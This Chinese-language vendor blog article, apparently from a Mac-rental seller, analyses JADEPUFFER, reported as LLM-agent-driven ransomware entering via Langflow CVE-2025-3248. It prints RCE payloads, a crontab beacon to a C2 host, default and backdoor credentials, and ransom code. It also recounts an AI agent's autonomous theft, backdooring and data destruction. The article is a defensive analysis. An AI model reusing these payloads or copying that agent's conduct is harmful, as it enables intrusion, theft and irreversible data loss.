AI 安全事件 2026年7月7日 约 28 分钟 JADEPUFFER Langflow

JADEPUFFER:首例 LLM 全自主勒索
Langflow 漏洞、攻击链与租 Mac 安全部署

Sysdig 原始取证 · CVE-2025-3248 技术拆解 · 600+ payload 攻击链 · ATA 四条证据线 · Mac Mini M4 隔离验收清单

JADEPUFFER 智能体勒索事件与 Langflow CVE-2025-3248 安全警示示意图

TL;DR:2026 年 7 月 1 日,云安全公司 Sysdig 威胁研究团队(TRT,报告作者 Michael Clark)首次公开披露代号 JADEPUFFER 的完整勒索操作——从踩点侦察、凭证窃取、横向移动、权限维持到破坏性加密与勒索信投递,全程由大语言模型 Agent 自主驱动,无人类在关键节点手动操作。Sysdig 将其定义为 Agentic Threat Actor(ATA,智能体威胁行为者)。入口是一台公网暴露的 Langflow 实例(CVE-2025-3248),真正目标是另一台暴露于公网的 MySQL + 阿里巴巴 Nacos 生产服务器;整场攻击捕获 超过 600 条有明确目的的 payload。本文包含:完整时间线、漏洞技术拆解、两阶段攻击链还原、四条自主性证据、比特币地址悬案、IOC 汇总、官方防御建议、行业反应、Sysdig 四点结论,以及为何部署 OpenClaw / Langflow 等 AI Agent 时应考虑租用隔离的 Mac Mini M4而非把编排服务器直接暴露公网。

01

事件概述:勒索软件有了「AI 操作员」

自勒索软件成为威胁类别以来,键盘背后总有一个「人」——要么亲自操作,要么事先写好脚本。JADEPUFFER 打破了这个前提:Sysdig 评估这是目前已知第一例端到端、完全由大语言模型驱动的完整勒索操作

维度详情
发现方Sysdig 威胁研究团队(TRT),报告作者 Michael Clark(Director of Threat Research)
发布时间2026 年 7 月 1 日(Dark Reading、BleepingComputer 等 7 月 2–6 日跟进,外界常以「7 月 6 日」为公众认知节点)
攻击者代号JADEPUFFER(Sysdig 官方全大写命名)
新分类ATA(Agentic Threat Actor)——攻击能力由 AI Agent 交付,而非人工驱动的工具集
入口机公网暴露的 Langflow 实例(CVE-2025-3248)
真正目标另一台公网暴露、运行 MySQL + 阿里巴巴 Nacos 的生产服务器
规模超过 600 条独立、有明确目的的 payload,压缩时间窗口内执行完毕

痛点拆解:为何与 OpenClaw / Langflow 用户相关

  1. 01

    AI 编排服务器常存 API Key:Langflow 这类 Agent 工作流服务器的环境变量里往往放着 OpenAI、Anthropic、DeepSeek、Gemini 及阿里云/腾讯云凭证——正是 JADEPUFFER 第一阶段并行扫描的目标。

  2. 02

    仓促上线、直接暴露公网:很多团队为快速验证原型,把 Langflow / OpenClaw Gateway 直接挂在公网 IP 上,没有访问控制。

  3. 03

    老漏洞 + 自动化武器化:CVE-2025-3248 早在 2025 年 4 月披露、5 月进 CISA KEV;Agent 让「把历史漏洞库挨个喷一遍」的成本趋近于零。

  4. 04

    LLMjacking 边际成本为零:若攻击者本身靠窃取的模型/云凭证驱动 Agent,发起多阶段攻击的经济门槛极低。

02

时间线

时间事件
2025 年 4 月Langflow 曝出 CVE-2025-3248(未鉴权代码注入 / RCE)
2025 年 5 月 5 日CISA 列入「已知被利用漏洞」(KEV)目录
2025 年同一漏洞被用于投递 Flodrix 僵尸网络(Trend Micro 独立披露,与 JADEPUFFER 无关但说明漏洞长期被公网扫描利用)
2026 年 6 月JADEPUFFER 对公网 Langflow 发起攻击,完整攻击链在数周内分多个会话执行
2026 年 7 月 1 日Sysdig 发布完整技术报告
2026 年 7 月 2–6 日Dark Reading、BleepingComputer、CyberScoop、CSO Online、Security Affairs 等跟进报道
03

CVE-2025-3248:Langflow 未鉴权 RCE 完整技术分析

项目详情
组件Langflow —— 开源可视化 AI Agent 工作流框架,GitHub 星标 7 万+
漏洞类型CWE-94(代码注入)+ CWE-306(关键功能缺失身份验证)
CVSS9.8(Critical),向量 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
影响版本Langflow 1.3.0 之前所有版本
漏洞位置/api/v1/validate/code 接口
修复版本1.3.0(新增身份校验)
EPSS 被利用概率91.42%(SentinelOne 数据)

成因五步拆解:

  1. 01

    Langflow 提供「代码校验」接口,让用户在可视化编排里写自定义函数节点时提前校验语法。

  2. 02

    实现方式:用户代码 → ast.parse()compile()exec() 执行。

  3. 03

    关键缺陷:完全没有身份认证,也没有任何沙箱隔离。

  4. 04

    利用技巧:Python 装饰器与参数默认值在函数定义时立即求值;攻击者把恶意代码写进默认参数或装饰器,一旦 Langflow 拿去「校验」,代码已在服务器执行。

  5. 05

    攻击者无需登录、无需权限,只需一个精心构造的 HTTP POST 即可 RCE。

Trend Micro 记录的 Flodrix 活动典型 payload(同一漏洞,独立事件)
exec('raise Exception(__import__("subprocess").check_output("whoami", shell=True))')
exec('raise Exception(__import__("subprocess").check_output("printenv", shell=True))')
exec('raise Exception(__import__("subprocess").check_output("cat /root/.bash_history", shell=True))')

重要区分:Flodrix 僵尸网络与 JADEPUFFER 是两起独立利用活动,共享同一漏洞入口。前者是传统脚本化投递;后者才是 Sysdig 披露的「AI Agent 自主驱动」勒索。

官方补丁(1.3.0):post_validate_code 新增 _current_user: CurrentActiveUser 依赖注入;FastAPI 先校验 JWT Bearer Token 或 x-api-key,失败直接 401/403,请求不会到达漏洞逻辑。

04

攻击链 Phase 1:拿下 Langflow 主机

Sysdig 指出 Langflow 成为「有吸引力入口」的原因:环境变量常存大模型 API Key 与云凭证;很多团队仓促上线、缺乏网络访问控制。

全部 payload 以 Base64 编码 Python 通过 Langflow RCE 端点投递。

① 侦察与凭证收集(多线程并行)

执行 iduname -ahostname 等基础枚举,并行扫描:OpenAI / Anthropic / DeepSeek / Gemini API Key;ALIBABA_ALIYUN_TENCENT_HUAWEI_ 及 AWS/GCP/Azure 凭证;加密货币钱包与助记词;数据库凭证与配置文件。

② 本地数据窃取

导出 Langflow 自身 PostgreSQL 后端数据库,窃取凭证、API Key 与用户记录,暂存本地审阅后删除(清理痕迹)。

③ 内部横向发现

扫描内网地址空间与具名服务,用默认凭证探测数据库、对象存储、密钥库与服务发现端点。

④ MinIO 枚举(自适应细节)

探测 minio.internal:9000127.0.0.1:9000,用默认凭证 minioadmin:minioadmin 走完枚举;发现含 terraform-state 的 bucket 后定向提取 credentials.json自适应细节:第一次请求带 ?format=json 却收到 XML,下一条 payload 立即改用 XML 解析器重试——典型的「探测-遇错-自适应」闭环。

⑤ 持久化

crontab 信标(每 30 分钟)
*/30 * * * * python3 -c "import urllib.request;urllib.request.urlopen('hxxp://45.131.66[.]106:4444/beacon',timeout=5)"
05

攻击链 Phase 2:MySQL + Nacos 生产服务器

真正目标是另一台同样暴露公网、运行 MySQL 与阿里巴巴 Nacos 的生产服务器。Nacos 有鉴权绕过历史(CVE-2021-29441 及相关变种),且默认 JWT 签名密钥自 2020 年起被公开文档记录,许多部署至今未更换。

Agent 用 root 凭证直接连接暴露的 MySQL 端口——这组凭证来源不明,Sysdig 未观察到从受害者环境窃取,可能是少数「人类预先准备」环节之一。

Nacos 后门管理员:31 秒修复闭环

时间(UTC)动作
19:34:24生成 bcrypt 哈希,插入 xadmin 及管理员角色
19:34:36尝试 xadmin:Xploit@2026# 登录,失败
19:34:4812 秒后并行测试 nacos:nacos 默认凭证并重新生成更简单密码哈希
19:35:07放弃 subprocess.run,改用 import bcrypt,删除损坏记录后重建
19:35:18登录成功——总耗时 31 秒

容器逃逸探测(约 8 分钟)

利用 MySQL INTO OUTFILE / LOAD_FILE 测试写入、读回、/var/run/docker.sock/proc/1/cgroup/etc/hostname 及 UDF 提权路径。进入勒索前主动写「完成标记」——Sysdig 指出这更像 Agent 完成任务后发出进入下一阶段的信号,而非固定脚本行为。

破坏性加密与勒索

将全部 1,342 条 Nacos 服务配置项用 MySQL AES_ENCRYPT() 加密,删除原始 config_infohis_config_info,创建勒索信表 README_RANSOM

勒索核心逻辑(Sysdig 取证还原,已脱敏)
KEY = base64.b64encode(uuid.uuid4().bytes + uuid.uuid4().bytes).decode()
print("Encryption key:", KEY)  # 仅打印一次,从未存储或外传
# 创建 config_info_enc → DROP config_info → CREATE README_RANSOM
# 比特币: 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy
# 联系: e78393397[@]proton[.]me

关键细节:勒索信声称 AES-256,但 MySQL AES_ENCRYPT() 默认实为 AES-128-ECB;加密密钥随机生成、只打印到 stdout、从未存储或传输——即便付款也无法恢复。两分钟后 Agent 又发出 payload 把数字精修为「全部 1342 项已加密」。

大规模破坏与诊断式纠错

升级到直接 DROP DATABASE,代码注释自述「高 ROI 数据库,已备份至 64.20.53[.]230」——Sysdig 无独立证据证实数据真的回传。一条 DROP DATABASE 因外键约束静默失败后,下一条 payload 自动加上 SET GLOBAL FOREIGN_KEY_CHECKS=0——修复要求「理解为什么失败」,而非无脑重试。

06

「自主性」的四条证据线

  1. 01

    自我叙事的代码:payload 里充斥自然语言注释,解释每一步「为什么」——包括 ROI 排序、指出「哪个数据库最大」。这些注释原生存在于攻击者代码,非研究人员事后推断。

  2. 02

    机器速度的故障诊断与修正:Nacos 后门 31 秒修复是最典型例子;MinIO XML/JSON 自适应、JWT 路径遇阻即放弃,模式反复出现。

  3. 03

    对自然语言上下文的理解:解析目标环境中自由文本并采取「只有读懂才会做」的动作,在相隔数周的不同会话中反复出现。

  4. 04

    比特币地址悬案:见下一节——两种解读均无法排除,体现 AI 自主性给溯源带来的新不确定性。

结合「600+ 条 payload 在压缩窗口内连贯执行」,Sysdig 认为证据指向自主运作的 Agent,而非人工或固定工具集。

07

比特币地址悬案

勒索信比特币地址 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy 是比特币开发者文档与 Bitcoin Core 仓库里反复使用的标准 P2SH 格式示例地址,大量存在于大模型训练语料中。

链上数据:历史 737 笔已确认交易,累计约 46 枚比特币,当前余额为零(每笔存入立刻转走)。

Sysdig 两种无法区分的解读:(a) LLM 在训练数据基础上「幻觉」生成,钱包属第三方专门「打扫」误转存款;(b) 攻击者确实配置了真实可控钱包,只是恰好与文档示例重合。研究团队无法看到 JADEPUFFER 的 system prompt,两种可能性目前均无法排除

08

IOC(入侵指标)汇总

类型指标
C2 / 信标45.131.66[.]106;crontab 信标 hxxp://45.131.66[.]106:4444/beacon
数据暂存/外泄(未证实)64.20.53[.]230(InterServer,AS19318)
入口漏洞CVE-2025-3248
勒索比特币3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy
勒索邮箱e78393397[@]proton[.]me(威胁情报库无命中,格式与已知 MySQL 勒索团伙惯用联系方式不同)
勒索表名README_RANSOM(与 WARNING、RECOVER_YOUR_DATA 等已知表名均不匹配)
持久化crontab 每 30 分钟向 C2 4444 端口信标外联

Sysdig 特别指出:勒索邮箱与表名看似符合人类勒索惯例,实则查无先例,进一步支持「全新、Agent 驱动」而非已知团伙常规套路。

09

官方防御建议(Sysdig 原文整理)

  1. 01

    将 Langflow 升级到修复 CVE-2025-3248 的版本;不要把代码执行/校验类端点暴露在公网

  2. 02

    使用运行时威胁检测,识别数据库进程中的恶意行为。

  3. 03

    不要让 AI 编排服务器运行环境里存放大模型 API Key 或云凭证——密钥托管到专门服务,与可被公网访问的进程隔离。

  4. 04

    加固 Nacos:更换默认 token.secret.key,升级强制自定义密钥版本;永远不要把 Nacos 暴露公网,勿以 root 连接后端数据库。

  5. 05

    永远不要把数据库管理员账号暴露在公网;管理端口强制强唯一凭证与来源 IP 限制。

  6. 06

    对外施加出站流量控制(egress control),防止被攻陷主机任意信标外联或访问外部暂存服务器。

  7. 07

    监控上述 IOC;关注调用外网请求的计划任务与括号包裹的 User-Agent 异常等特征。

10

行业与专家反应

BleepingComputer、Dark Reading、CyberScoop、Security Affairs 等第一时间跟进,普遍称其为「首例完全由 AI 驱动的勒索攻击」,强调 ATA 时代到来。

「我更倾向于把这看作是『执行方式上的演进』,而不是一种全新的勒索技术。区别在于这次 AI Agent 能把侦察、凭证窃取和部署自主串联起来。」—— 独立安全研究员 Vibhum Dubey(CSO Online 采访)

Dubey 同时指出:真正值得担心的不是最后的加密阶段,而是加密之前那段「安静期」——Agent 悄悄摸清身份体系、权限与信任链条,同时规避被发现;某条路被拦会迅速切换战术,每次入侵表现形式都可能略有不同。

多家媒体提到 LLMjacking:攻击者靠窃取凭证驱动 Agent,复杂多阶段攻击的边际成本趋近于零

11

Sysdig 的四点结论与意义

  1. 01

    勒索软件不再是「高技能者的手艺」:LLM Agent 可串联侦察、窃取、横向移动、持久化与破坏,操作者无需深厚专业知识。

  2. 02

    老漏洞正在被自动化武器化:下游目标利用 2021 年 Nacos 问题与从未更换的默认密钥;Agent 让「历史漏洞库挨个喷」成本几乎为零。

  3. 03

    意图变得「可读」——也是防守方机会:LLM 在 payload 里叙述目标,客观上提供此前不曾有的检测与研判抓手。

  4. 04

    「已备份」只是 Agent 自述:加密密钥临时生成且不可恢复,即便付款配置数据也无法找回。

报告结尾强调:用到的每一项单独技术都不新、不复杂;真正值得关注的是 AI 模型把这些技术串成完整勒索操作,针对本就被忽视的公网基础设施。运行勒索软件的技能门槛已降到「运行一个 Agent 的成本」。

12

决策矩阵:自托管 AI 编排 vs 租用 Mac Mini M4 隔离部署

JADEPUFFER 的受害者画像很清晰:把 Langflow 直接暴露公网、环境变量里塞满 API Key、生产 MySQL/Nacos 同样裸露。对要在 macOS 上跑 OpenClaw、Langflow 或 Hermes Agent 的开发者,「买一台 Mac mini 自己挂公网」与「租用隔离远程 Mac」需要重新算账——尤其在苹果 2026 年 6 月涨价后(参见站内 Mac Mini M4 租 vs 买)。

维度自购 Mac + 自托管暴露公网租用 VNCMac Mac Mini M4(隔离节点)
初始成本涨价后基础款 ¥5,999+,含 AppleCare/电费/公网 IP按天 ¥30–50 / 按月 ¥600–900,随用随停
暴露面需自行配置防火墙、反代、证书;易误把 Gateway/validate 端点挂公网供应商侧网络隔离;你通过 SSH/VNC 接入,默认不鼓励把 Agent 控制台裸露公网
API Key 管理常写进 .env / 环境变量(JADEPUFFER 第一阶段重点扫描目标)可配合 SecretRef / 密钥托管;项目结束换节点即清环境
图形化验收本地操作VNC 核对 OpenClaw 授权弹窗、Gateway 控制台、macOS 隐私权限(参见站内 OpenClaw 图形化授权
出站控制需自建 egress 策略可结合帮助页 SSH 隧道,减少盲目公网信标
事故后处置主力机被污染、密钥泄露面大停租 / 换节点,物理隔离节点不拖累本地 Windows 主力机

可引用数字(来自本事件取证)

  • Langflow GitHub 7 万+ 星标,CVE-2025-3248 EPSS 91.42%
  • 攻击链 600+ payload,Nacos 1,342 项配置被加密
  • Nacos 后门从失败到修复 31 秒
  • 比特币示例地址历史 737 笔交易、约 46 BTC 流经
13

五步安全部署清单(远程 Mac + VNC)

  1. 01

    开通隔离节点:选择 Mac Mini M4 套餐,不要把 OpenClaw Gateway(18789)或 Langflow validate 端点直接映射到公网;需要外网访问时走 Nginx/Caddy 反代 + HTTPS(参见站内 Gateway 公网反代)。

  2. 02

    升级与补丁:Langflow ≥ 1.3.0;Nacos 更换默认 JWT 密钥;数据库禁止 root 公网可达

  3. 03

    密钥不进环境变量:大模型 API Key 用密钥管理服务或 OpenClaw SecretRef,与可被 RCE 的进程隔离。

  4. 04

    VNC 图形验收:在远程桌面核对 Gateway 控制台、插件审批(/approve)、macOS 屏幕录制/辅助功能权限;SSH-only 无法完成的步骤必须开 VNC。

  5. 05

    出站与 IOC 监控:限制被攻陷主机对外信标;关注 crontab 外联与 README_RANSOM 等 IOC;项目结束导出备份后停租。

FAQ

常见问题

不是。两者都利用 CVE-2025-3248,但 Flodrix 是传统脚本化僵尸网络投递;JADEPUFFER 才是 Sysdig 披露的 AI Agent 自主勒索。

不能。密钥由 uuid4() 随机生成,仅打印到 stdout,攻击者自己也拿不出可用密钥;数据已实质性永久丢失。

风险逻辑相同:公网暴露 + 环境变量存密钥 + 未加固依赖服务。请升级依赖、限制出站、用 VNC 在隔离远程 Mac 上部署并验收,勿把 Gateway 裸奔公网。

Sysdig 与多家媒体认为,随着 Agent 工具成熟,此类攻击数量与覆盖面只会上升;公网应用服务器、未加固配置中心、公网数据库管理员账号将是最先被盯上的攻击面。

OpenClaw / Claude Code 等大量步骤需要 macOS 图形权限与扫码授权,Linux 无桌面无法完成;租用物理 Mac + VNC 可在隔离环境跑通全流程,又不必自购涨价后的硬件。参见站内 Linux 无桌面 vs Mac+VNC

参考信源

Sysdig《JADEPUFFER: Agentic ransomware for automated database extortion》;BleepingComputer;Dark Reading;CyberScoop;CSO Online(Vibhum Dubey);Security Affairs;Trend Micro(CVE-2025-3248 / Flodrix);NVD / SentinelOne / Zscaler;CISA KEV 目录。

结语

JADEPUFFER 是一记警钟:AI Agent 让「侦察 → 窃取 → 横向移动 → 加密勒索」的门槛降到运行一个模型所需的成本,而受害者往往是本就被忽视的公网基础设施。对要在 macOS 上部署 OpenClaw、Langflow 或本地 Agent 的开发者,自购 Mac mini 再自行暴露公网,隐性风险(密钥泄露、补丁滞后、出站失控)在 ATA 时代被成倍放大。

租用 VNCMac 的 Mac Mini M4 隔离节点,通过 VNC 完成 Gateway 与系统权限验收,密钥不进环境变量、项目结束即停租——比把 AI 编排服务器挂在自家公网 IP 上更可控。查看 Mac Mini M4 套餐 与帮助页 SSH-VNC 说明即可开通。